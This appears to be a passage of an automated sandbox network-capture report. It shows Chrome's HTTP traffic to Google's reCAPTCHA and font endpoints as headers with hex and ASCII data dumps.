                                                                                                                                                                                                                                                                  2024-10-29 19:10:10 UTC1378INData Raw: 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 59 55 74 66 43 78 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 32 2d 30 31 30 33 2c 20 55 2b 30 31 31 30 2d 30 31 31 31 2c 20 55 2b 30 31 32 38 2d 30 31 32 39 2c 20 55 2b 30 31 36 38 2d 30 31 36 39 2c 20 55 2b 30 31 41 30 2d 30 31 41 31 2c 20 55 2b 30 31 41 46 2d 30 31 42 30 2c 20 55 2b 30 33 30 30 2d 30 33 30 31 2c 20 55 2b 30 33 30 33 2d 30 33 30 34 2c 20 55 2b 30 33 30 38 2d
                                                                                                                                                                                                                                                                  Data Ascii: e: normal; font-weight: 900; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmYUtfCxc4EsA.woff2) format('woff2'); unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-
                                                                                                                                                                                                                                                                  2024-10-29 19:10:10 UTC601INData Raw: 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 2d 5a 47 37 42 43 39 54 78 43 56 45 62 7a 49 4f 32 6d 34 32 39 75 73 62 2f 72 65 63 61 70 74 63 68 61 5f 5f 65 6e 2e 6a 73 22 20 6e 6f 6e 63 65 3d 22 61 73 5a 6a 67 75 6a 73 55 58 52 2d 6c 62 79 65 53 57 5f 4b 76 41 22 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 2d 74 6f 6b 65 6e 22 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d
                                                                                                                                                                                                                                                                  Data Ascii: "text/javascript" src="https://www.gstatic.com/recaptcha/releases/-ZG7BC9TxCVEbzIO2m429usb/recaptcha__en.js" nonce="asZjgujsUXR-lbyeSW_KvA"> </script></head><body><input type="hidden" id="recaptcha-token"><script type="text/javascript" nonce=
                                                                                                                                                                                                                                                                  2024-10-29 19:10:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  59192.168.2.1649780142.250.186.684437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:11 UTC860OUTPOST /recaptcha/api2/reload?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 10202
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Type: application/x-protobuffer
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Origin: https://www.google.com
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:10:11 UTC10202OUTData Raw: 0a 18 2d 5a 47 37 42 43 39 54 78 43 56 45 62 7a 49 4f 32 6d 34 32 39 75 73 62 12 b9 0f 30 33 41 46 63 57 65 41 34 4f 57 39 6c 4c 4d 6a 56 68 59 72 6c 4e 4c 72 32 6b 35 51 41 6c 6e 78 39 56 5f 4d 4c 44 70 62 73 2d 6e 43 57 73 43 46 59 79 42 78 74 4f 35 58 32 30 39 30 4a 35 44 49 52 73 2d 34 57 48 43 79 68 43 56 30 41 75 50 45 67 49 57 67 39 38 68 62 32 4c 39 78 6a 71 30 54 72 4c 6f 6f 57 77 4a 54 58 44 59 36 41 72 6c 57 6e 71 46 6e 32 45 75 73 32 47 45 42 50 4a 5f 31 74 6b 4c 38 75 36 52 51 63 5a 6d 65 75 6c 46 59 67 59 67 4a 55 63 79 4c 65 71 76 6b 77 33 4e 43 48 4a 50 70 4d 49 42 75 6d 6d 32 48 52 45 58 79 68 68 47 63 63 78 76 4a 5a 6c 56 30 79 6d 38 45 55 4c 52 6e 79 4f 61 62 75 6a 73 73 38 54 4e 59 4d 50 37 69 6a 77 55 58 5a 31 54 78 51 6c 56 34 64 6d
                                                                                                                                                                                                                                                                  Data Ascii: -ZG7BC9TxCVEbzIO2m429usb03AFcWeA4OW9lLMjVhYrlNLr2k5QAlnx9V_MLDpbs-nCWsCFYyBxtO5X2090J5DIRs-4WHCyhCV0AuPEgIWg98hb2L9xjq0TrLooWwJTXDY6ArlWnqFn2Eus2GEBPJ_1tkL8u6RQcZmeulFYgYgJUcyLeqvkw3NCHJPpMIBumm2HREXyhhGccxvJZlV0ym8EULRnyOabujss8TNYMP7ijwUXZ1TxQlV4dm
                                                                                                                                                                                                                                                                  2024-10-29 19:10:12 UTC1000INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:12 GMT
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  Set-Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o; Expires=Sun, 27-Apr-2025 19:10:12 GMT; Path=/recaptcha; Secure; HttpOnly; Priority=HIGH; SameSite=none
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:10:12 GMT
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:10:12 UTC378INData Raw: 34 30 34 35 0d 0a 29 5d 7d 27 0a 5b 22 72 72 65 73 70 22 2c 22 30 33 41 46 63 57 65 41 35 6c 44 53 32 31 72 41 6f 52 76 70 31 77 31 73 64 61 4b 62 72 48 4d 35 72 58 33 71 57 6d 73 33 44 79 64 4c 76 50 45 51 6c 70 58 79 55 43 4d 76 66 75 70 6c 34 54 75 77 59 34 31 63 50 68 4d 73 5f 6f 75 4f 55 6e 77 49 6c 50 4e 69 71 73 57 35 48 38 55 77 51 4f 31 67 6a 73 41 63 6c 70 2d 4a 71 69 75 68 6c 4b 71 45 59 5a 4d 6d 74 68 77 45 58 34 33 4e 6f 31 7a 72 62 35 64 43 58 62 69 50 31 4f 63 6b 66 46 35 6e 54 64 67 4c 76 4a 73 53 51 6b 6f 2d 4f 36 54 73 36 4f 68 71 59 69 62 65 37 55 34 45 6c 6e 64 6b 50 57 32 74 4c 39 42 53 48 5f 6a 70 64 53 6f 4b 69 36 41 38 30 4d 72 37 5f 33 37 70 34 5f 34 39 4a 56 68 76 57 67 68 6d 71 62 76 4d 57 52 73 4c 6e 65 49 54 55 49 41 41 30 54
                                                                                                                                                                                                                                                                  Data Ascii: 4045)]}'["rresp","03AFcWeA5lDS21rAoRvp1w1sdaKbrHM5rX3qWms3DydLvPEQlpXyUCMvfupl4TuwY41cPhMs_ouOUnwIlPNiqsW5H8UwQO1gjsAclp-JqiuhlKqEYZMmthwEX43No1zrb5dCXbiP1OckfF5nTdgLvJsSQko-O6Ts6OhqYibe7U4ElndkPW2tL9BSH_jpdSoKi6A80Mr7_37p4_49JVhvWghmqbvMWRsLneITUIAA0T
                                                                                                                                                                                                                                                                  2024-10-29 19:10:12 UTC1378INData Raw: 47 43 32 43 31 35 43 5a 50 54 4d 37 4b 44 41 6d 44 37 32 6f 35 49 75 7a 59 41 69 54 62 6c 41 59 5f 7a 55 78 5a 4d 79 6b 75 5a 6c 6f 5f 34 67 66 78 2d 70 69 4e 32 52 54 62 4d 32 6c 35 69 50 64 36 36 36 6b 4f 4a 79 61 33 41 66 68 6f 37 42 69 52 35 4d 7a 4c 4f 68 72 37 49 65 47 62 4a 42 63 49 6b 47 45 73 57 5f 68 4a 79 38 61 57 4a 53 57 53 59 71 57 4c 66 61 6a 63 5f 51 39 51 4d 47 48 57 5a 75 52 73 71 42 49 2d 39 33 68 4e 46 56 43 58 6c 6e 50 63 59 5f 70 77 64 34 67 46 4d 51 30 6c 4a 4d 44 43 6c 30 7a 4d 2d 43 48 4c 38 51 45 42 35 4a 6a 5f 57 49 4e 44 61 63 74 6d 72 77 34 58 4e 38 2d 72 57 77 73 51 76 69 36 44 50 78 77 33 6c 46 70 68 78 47 49 65 47 5a 6a 53 77 50 2d 34 37 39 6a 37 33 57 63 48 4f 75 6b 30 5a 50 2d 65 64 47 6b 4c 77 51 33 49 44 75 70 4d 43 4e
                                                                                                                                                                                                                                                                  Data Ascii: GC2C15CZPTM7KDAmD72o5IuzYAiTblAY_zUxZMykuZlo_4gfx-piN2RTbM2l5iPd666kOJya3Afho7BiR5MzLOhr7IeGbJBcIkGEsW_hJy8aWJSWSYqWLfajc_Q9QMGHWZuRsqBI-93hNFVCXlnPcY_pwd4gFMQ0lJMDCl0zM-CHL8QEB5Jj_WINDactmrw4XN8-rWwsQvi6DPxw3lFphxGIeGZjSwP-479j73WcHOuk0ZP-edGkLwQ3IDupMCN
                                                                                                                                                                                                                                                                  2024-10-29 19:10:12 UTC1378INData Raw: 76 69 44 47 4e 5a 38 36 58 73 56 32 4a 37 6b 6f 58 75 72 70 31 71 79 64 31 5f 42 75 73 59 52 79 65 76 4f 6d 5f 79 6e 64 6d 6e 32 7a 78 54 31 4f 66 33 51 76 4a 68 51 42 4a 4b 39 6b 73 46 37 38 48 6a 46 52 5f 79 4a 75 49 5f 47 41 71 4d 2d 61 48 6b 42 4d 7a 4e 74 4b 44 35 74 51 78 52 41 74 67 32 56 4f 41 59 7a 4e 2d 75 45 67 79 31 4b 35 59 74 4f 57 67 48 79 58 2d 31 35 4f 4e 43 53 52 62 68 48 47 32 75 31 6c 64 5a 34 77 5a 41 59 37 61 49 74 41 36 51 4c 41 7a 63 45 34 71 47 48 37 63 47 50 58 57 6d 39 6a 45 6b 70 72 62 4c 37 57 55 4e 77 76 6d 71 39 30 79 4b 42 51 4e 6a 30 5f 31 35 6e 79 66 57 54 38 30 6c 69 6a 63 74 4d 6c 66 55 42 6a 32 6f 45 35 61 65 74 4f 5a 76 69 75 43 54 35 74 4d 30 6d 58 4b 36 49 71 59 71 47 5f 61 6d 6c 4c 67 46 70 34 71 39 6c 55 30 58 78
                                                                                                                                                                                                                                                                  Data Ascii: viDGNZ86XsV2J7koXurp1qyd1_BusYRyevOm_yndmn2zxT1Of3QvJhQBJK9ksF78HjFR_yJuI_GAqM-aHkBMzNtKD5tQxRAtg2VOAYzN-uEgy1K5YtOWgHyX-15ONCSRbhHG2u1ldZ4wZAY7aItA6QLAzcE4qGH7cGPXWm9jEkprbL7WUNwvmq90yKBQNj0_15nyfWT80lijctMlfUBj2oE5aetOZviuCT5tM0mXK6IqYqG_amlLgFp4q9lU0Xx
                                                                                                                                                                                                                                                                  2024-10-29 19:10:12 UTC1378INData Raw: 62 63 6a 2d 67 72 50 4e 58 70 41 64 38 46 4b 54 63 58 32 4b 6e 42 44 74 6f 6d 68 69 6a 2d 66 4c 67 47 68 4d 4a 58 4c 37 75 59 50 31 4a 73 46 2d 67 68 4d 6c 41 51 2d 56 71 31 65 54 69 77 32 51 4d 79 39 4c 6f 4c 58 33 4c 45 74 6e 70 52 45 65 6c 42 6e 38 78 73 54 71 46 75 59 6d 71 71 73 37 48 71 67 5f 39 71 77 76 6b 4d 50 53 74 33 38 61 45 39 6f 33 4e 6e 70 59 59 6d 48 63 78 77 6c 5a 6d 50 52 6d 58 50 6b 4f 55 53 48 35 74 54 30 42 4f 4b 39 4c 56 38 4f 4f 48 57 2d 77 4c 7a 59 51 63 45 57 5a 72 50 78 78 63 32 74 39 64 56 57 4a 45 50 7a 66 6a 65 34 4e 67 4f 37 56 5f 47 61 31 4d 61 63 2d 58 53 4e 63 75 2d 63 5a 74 2d 79 65 66 51 4e 4b 42 32 4e 47 64 77 73 35 7a 53 49 61 51 71 44 6a 45 2d 35 74 47 6a 32 55 45 55 48 6a 71 4e 39 5f 51 45 70 66 43 4a 53 63 4c 6d 46
                                                                                                                                                                                                                                                                  Data Ascii: bcj-grPNXpAd8FKTcX2KnBDtomhij-fLgGhMJXL7uYP1JsF-ghMlAQ-Vq1eTiw2QMy9LoLX3LEtnpREelBn8xsTqFuYmqqs7Hqg_9qwvkMPSt38aE9o3NnpYYmHcxwlZmPRmXPkOUSH5tT0BOK9LV8OOHW-wLzYQcEWZrPxxc2t9dVWJEPzfje4NgO7V_Ga1Mac-XSNcu-cZt-yefQNKB2NGdws5zSIaQqDjE-5tGj2UEUHjqN9_QEpfCJScLmF
                                                                                                                                                                                                                                                                  2024-10-29 19:10:12 UTC1378INData Raw: 4c 41 45 6b 5a 39 46 75 61 41 74 65 44 48 6b 79 4d 63 57 50 32 65 36 7a 63 4f 59 6a 55 32 41 31 4c 4b 59 73 42 6a 62 4d 76 57 32 76 70 6d 62 75 4c 7a 45 63 37 31 69 51 42 4e 31 67 49 49 31 31 76 6f 63 45 53 4c 35 7a 56 41 73 75 6f 4e 56 37 77 36 6a 5f 65 49 2d 44 7a 47 4b 4d 58 42 46 75 34 42 5a 61 71 73 65 5a 66 64 55 50 73 69 2d 74 50 4c 5a 30 4e 47 4a 38 33 45 71 67 30 5a 63 2d 6d 4e 33 4d 6c 31 56 72 59 7a 31 50 41 56 73 51 53 70 58 37 63 41 47 52 62 63 66 77 47 59 65 31 45 4f 62 66 59 63 4c 47 47 5a 41 44 52 38 47 73 59 43 39 5f 72 33 4d 72 58 62 6b 52 76 57 6d 41 63 67 4b 51 45 6d 62 44 43 6f 6d 49 4b 55 59 66 73 53 68 44 70 6f 48 32 65 71 5a 33 53 63 39 49 6b 6f 43 4e 6d 48 71 6d 31 59 59 42 35 5a 58 73 68 49 69 7a 77 6c 30 5f 43 45 77 50 51 43 57
                                                                                                                                                                                                                                                                  Data Ascii: LAEkZ9FuaAteDHkyMcWP2e6zcOYjU2A1LKYsBjbMvW2vpmbuLzEc71iQBN1gII11vocESL5zVAsuoNV7w6j_eI-DzGKMXBFu4BZaqseZfdUPsi-tPLZ0NGJ83Eqg0Zc-mN3Ml1VrYz1PAVsQSpX7cAGRbcfwGYe1EObfYcLGGZADR8GsYC9_r3MrXbkRvWmAcgKQEmbDComIKUYfsShDpoH2eqZ3Sc9IkoCNmHqm1YYB5ZXshIizwl0_CEwPQCW
                                                                                                                                                                                                                                                                  2024-10-29 19:10:12 UTC1378INData Raw: 6c 55 35 62 54 42 52 55 57 31 57 52 45 70 34 4f 46 4e 4d 4f 58 51 30 63 46 64 59 56 6e 42 50 53 6c 4e 77 4d 44 49 35 4e 6e 6c 6b 53 6d 31 76 4c 6d 70 7a 22 2c 22 22 2c 22 64 47 78 30 53 57 5a 58 61 6d 6f 32 55 30 78 4c 56 33 63 31 55 44 45 34 52 57 56 74 51 6c 70 77 4f 47 39 33 52 6b 70 49 54 58 59 7a 63 55 78 59 4e 6d 52 57 64 55 35 4e 4b 30 52 57 4e 46 4e 54 56 33 51 34 55 32 6c 36 54 44 4e 35 57 56 67 34 51 6c 4a 5a 4d 54 6c 33 52 7a 5a 6e 59 33 46 5a 57 45 63 30 4d 6c 70 44 4f 47 74 54 57 48 68 59 54 6c 4d 30 55 30 34 31 61 57 52 57 4e 46 68 76 65 44 68 77 55 58 64 31 59 31 46 6c 56 6a 64 42 51 54 6c 53 53 47 68 33 4d 69 74 71 61 47 74 46 52 47 45 78 54 33 63 35 53 47 35 68 62 6e 46 58 53 45 64 4f 54 6a 56 53 55 46 56 68 65 45 6c 75 4b 31 46 52 64 57
                                                                                                                                                                                                                                                                  Data Ascii: lU5bTBRUW1WREp4OFNMOXQ0cFdYVnBPSlNwMDI5NnlkSm1vLmpz","","dGx0SWZXamo2U0xLV3c1UDE4RWVtQlpwOG93RkpITXYzcUxYNmRWdU5NK0RWNFNTV3Q4U2l6TDN5WVg4QlJZMTl3RzZnY3FZWEc0MlpDOGtTWHhYTlM0U041aWRWNFhveDhwUXd1Y1FlVjdBQTlSSGh3MitqaGtFRGExT3c5SG5hbnFXSEdOTjVSUFVheEluK1FRdW
                                                                                                                                                                                                                                                                  2024-10-29 19:10:12 UTC1378INData Raw: 7a 6c 6e 5a 30 31 50 53 7a 67 79 62 47 52 68 4d 46 4a 79 61 54 46 61 57 6e 5a 74 52 6e 6c 30 65 6d 74 50 65 45 56 34 59 30 52 43 57 45 52 30 63 30 39 77 55 6d 59 35 57 48 46 76 4f 47 4a 4d 55 48 4a 58 54 31 68 59 65 45 64 56 59 31 70 4a 59 6b 31 36 5a 6d 52 4c 4e 58 59 77 62 6c 46 77 4d 33 59 7a 4d 56 42 61 63 6a 5a 54 64 47 4d 77 56 33 6f 35 63 6d 68 4a 4f 56 56 4c 54 54 68 6c 64 54 55 35 5a 31 6c 51 4d 6a 4a 69 4b 33 6f 33 59 31 4e 61 64 45 4e 68 63 6a 4a 45 53 6b 5a 33 51 56 42 31 5a 56 46 59 4f 57 68 48 61 7a 68 35 52 6c 64 6e 52 48 4e 54 62 33 52 56 65 47 6c 4c 4f 57 52 4f 64 56 56 51 56 6e 46 53 65 46 4d 35 4e 30 78 6a 62 30 68 77 65 45 46 44 4b 33 6f 33 55 58 5a 49 54 54 56 55 4d 30 52 79 4f 55 4e 7a 4e 53 39 43 51 32 6b 35 61 6e 6c 4d 62 6a 41 78
                                                                                                                                                                                                                                                                  Data Ascii: zlnZ01PSzgybGRhMFJyaTFaWnZtRnl0emtPeEV4Y0RCWER0c09wUmY5WHFvOGJMUHJXT1hYeEdVY1pJYk16ZmRLNXYwblFwM3YzMVBacjZTdGMwV3o5cmhJOVVLTThldTU5Z1lQMjJiK3o3Y1NadENhcjJESkZ3QVB1ZVFYOWhHazh5RldnRHNTb3RVeGlLOWROdVVQVnFSeFM5N0xjb0hweEFDK3o3UXZITTVUM0RyOUNzNS9CQ2k5anlMbjAx
                                                                                                                                                                                                                                                                  2024-10-29 19:10:12 UTC1378INData Raw: 6f 56 7a 59 31 4e 48 68 61 52 33 4e 35 51 30 77 32 4b 33 64 77 57 47 51 35 53 31 45 76 64 44 49 32 53 54 6c 32 64 55 64 47 65 58 5a 76 52 6d 56 34 64 48 64 33 5a 30 78 33 56 33 5a 55 64 32 35 50 62 6b 4d 33 4e 47 46 78 4d 44 6c 5a 51 6d 74 55 64 44 4a 4c 53 44 68 4d 63 33 6c 44 53 6c 6c 4f 4d 47 31 46 57 48 6c 42 65 44 46 6f 56 6d 4a 4e 55 32 34 77 5a 30 49 31 56 32 4a 78 53 46 4a 56 5a 6e 64 6d 53 31 52 70 65 6b 64 71 62 6a 4e 4f 54 6c 49 34 4e 30 67 34 55 6c 56 58 59 6d 39 50 52 32 45 77 51 6c 63 79 54 6c 5a 47 64 46 46 48 53 33 42 61 64 56 5a 77 59 54 4e 52 55 30 63 34 64 33 68 78 59 6a 64 54 51 33 6c 45 56 7a 52 51 57 44 52 47 5a 58 41 79 63 30 77 33 55 31 52 6d 4e 58 4a 4a 63 43 73 79 4f 45 52 31 64 54 56 48 56 6e 5a 49 61 31 52 70 63 54 6c 57 56 6d
                                                                                                                                                                                                                                                                  Data Ascii: oVzY1NHhaR3N5Q0w2K3dwWGQ5S1EvdDI2STl2dUdGeXZvRmV4dHd3Z0x3V3ZUd25PbkM3NGFxMDlZQmtUdDJLSDhMc3lDSllOMG1FWHlBeDFoVmJNU24wZ0I1V2JxSFJVZndmS1RpekdqbjNOTlI4N0g4UlVXYm9PR2EwQlcyTlZGdFFHS3BadVZwYTNRU0c4d3hxYjdTQ3lEVzRQWDRGZXAyc0w3U1RmNXJJcCsyOER1dTVHVnZIa1RpcTlWVm
                                                                                                                                                                                                                                                                  2024-10-29 19:10:12 UTC1378INData Raw: 57 39 77 55 6c 56 36 51 30 74 76 54 58 70 35 5a 47 74 4e 55 54 64 42 4b 30 4d 32 52 6b 78 5a 63 46 46 73 59 31 68 43 54 6e 67 33 4c 32 35 77 65 6a 42 78 54 6d 56 4c 56 6c 5a 6f 63 6a 52 56 5a 79 39 79 62 6e 52 33 4e 44 52 44 65 46 68 68 4b 31 46 59 55 43 39 31 52 6d 77 33 59 57 56 42 4d 33 6c 6c 51 55 39 30 56 55 4e 5a 63 47 4a 77 5a 32 68 59 51 58 68 54 61 33 70 33 57 6b 52 74 55 6c 46 4e 61 45 78 34 51 6e 4e 51 59 58 4d 34 63 30 70 6a 57 58 68 59 63 6a 42 58 4d 57 56 4f 52 44 5a 6f 5a 45 68 75 61 6d 4a 6f 64 55 46 35 4c 30 74 52 5a 56 52 4e 59 6d 4a 77 4d 31 6c 46 55 54 46 4e 55 32 5a 48 4f 55 78 51 62 44 51 31 62 56 4e 61 56 43 39 47 53 47 74 45 4d 55 68 69 62 46 46 72 4e 6c 46 55 53 55 46 6e 57 45 68 77 59 56 4d 76 52 48 70 73 64 7a 68 68 57 45 45 33
                                                                                                                                                                                                                                                                  Data Ascii: W9wUlV6Q0tvTXp5ZGtNUTdBK0M2RkxZcFFsY1hCTng3L25wejBxTmVLVlZocjRVZy9ybnR3NDRDeFhhK1FYUC91Rmw3YWVBM3llQU90VUNZcGJwZ2hYQXhTa3p3WkRtUlFNaEx4QnNQYXM4c0pjWXhYcjBXMWVORDZoZEhuamJodUF5L0tRZVRNYmJwM1lFUTFNU2ZHOUxQbDQ1bVNaVC9GSGtEMUhibFFrNlFUSUFnWEhwYVMvRHpsdzhhWEE3


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  60192.168.2.1649781142.250.184.1964437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:13 UTC606OUTGET /recaptcha/api2/reload?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:13 UTC743INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:13 GMT
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Allow: POST
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:10:13 UTC635INData Raw: 36 38 30 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f
                                                                                                                                                                                                                                                                  Data Ascii: 680<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 405 (Bad Request)!!1</title><style>*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{backgro
